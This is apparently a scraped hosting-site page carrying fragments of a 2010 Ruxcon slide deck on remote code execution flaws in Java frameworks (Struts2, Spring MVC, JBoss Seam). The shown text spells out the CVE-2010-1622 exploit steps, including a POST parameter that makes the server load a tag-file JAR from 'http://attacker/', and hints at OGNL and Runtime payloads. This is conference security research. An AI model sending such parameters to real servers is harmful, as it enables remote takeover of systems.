view.getClass().forName('java.lang.Runtime'). - 2010 - Ruxcon

More documents

Recommendations

Info

How do we supply TLD andtag files remotely?Jasper uses java.net.URL to scan JARsjava.net.URL automatically handles remote JAR URLs:jar:http://attacker/spring-form.jar!/Tag files are retrieved from the same JAR!!!Thursday, November 25, 2010
CVE-2010-1622 exploitDownload org.springframework.web.servlet-X.X.X.RELEASE.jarEdit spring-form.tld and add tag file definitions for all tags. Example for tag:input/META-INF/tags/InputTag.tagCreate corresponding tag files, e.g. InputTag.tag:Bundle everything back into spring-form.jar and put it up onlineSubmit POST request to a form controller with the following parameter:class.classLoader.URLs[0]=jar:http://attacker/spring-form.jar!/Thursday, November 25, 2010
Page 1 and 2:
Milking a horseorexecuting remote c
Page 3 and 4: kumys is a fermented dairy productt
Page 5 and 6: Thursday, November 25, 2010...back
Page 7 and 8: Plain old servletpublic class MySer
Page 9 and 10: Problemsa lot of verbose boilerplat
Page 11 and 12: user code complexityframework code
Page 13 and 14: How secure are these Java framework
Page 15 and 16: ApproachUse IDE (e.g. IntelliJ IDEA
Page 17 and 18: Look at how frameworkimplements its
Page 19 and 20: Nifty featuresRich taglibrary (e.g.
Page 21 and 22: Nifty featuresuser.address.city = B
Page 23 and 24: HTTP parameters == OGNL statementsW
Page 25 and 26: CVE-2010-1870Based on my previous b
Page 27 and 28: XW-641('\u0023' + 'session[\'user\'
Page 29 and 30: XW-641('\u0023' + 'session[\'user\'
Page 31 and 32: CVE-2010-1870There are actually mor
Page 33 and 34: CVE-2010-1870#context[‘xwork.Meth
Page 35 and 36: CVE-2010-1870 exploit#_memberAccess
Page 41 and 42: CVE-2010-1870 fix2.2.1 fixes vulner
Page 43 and 44: SpringSpring MVC is Spring’s web
Page 45 and 46: BeanInfo getBeanInfo(Class beanClas
Page 47 and 48: Introspector.getBeanInfo(Person);fi
Page 49 and 50: Introspector.getBeanInfo(Person);fi
Page 51 and 52: CVE-2010-1622Two problems:How do we
Page 53: InputTag.tagThursday, November 25,
Page 57 and 58: Thursday, November 25, 2010JBoss Se
Page 59 and 60: JBoss SeamCombines EJB3 with JSFPOJ
Page 61 and 62: CVE-2010-1871Special HTTP parameter
Page 63 and 64: CVE-2010-1871Special HTTP parameter
Page 65 and 66: CVE-2010-1871 exploitHow to execute
Page 67 and 68: CVE-2010-1871 exploitview.getClass.
Page 69 and 70: CVE-2010-1871 exploitview.getClass.
Page 71 and 72: CVE-2010-1871 exploitTo call java.l
Page 73 and 74: How do we get method’s index?/sea
Page 75 and 76: CVE-2010-1871 exploitMethod for Run
Page 77 and 78: CVE-2010-1871 exploit/seam-booking/
Page 79 and 80: Thursday, November 25, 2010
Page 83 and 84: What’s Java security manager?Sing
Page 85 and 86: Thursday, November 25, 2010Are you
Page 87 and 88: Why is nobody’s using it?Thursday
Page 89 and 90: Problems (cont.)Support for privile
Page 91 and 92: How do we solve these?*Thursday, No
Page 93 and 94: ProsWill address some of the perfor
Page 95 and 96: Where’s the code?Alpha version wi
show all

view.getClass().forName('java.lang.Runtime'). - 2010 - Ruxcon

Create successful ePaper yourself

Delete template?

Save as template?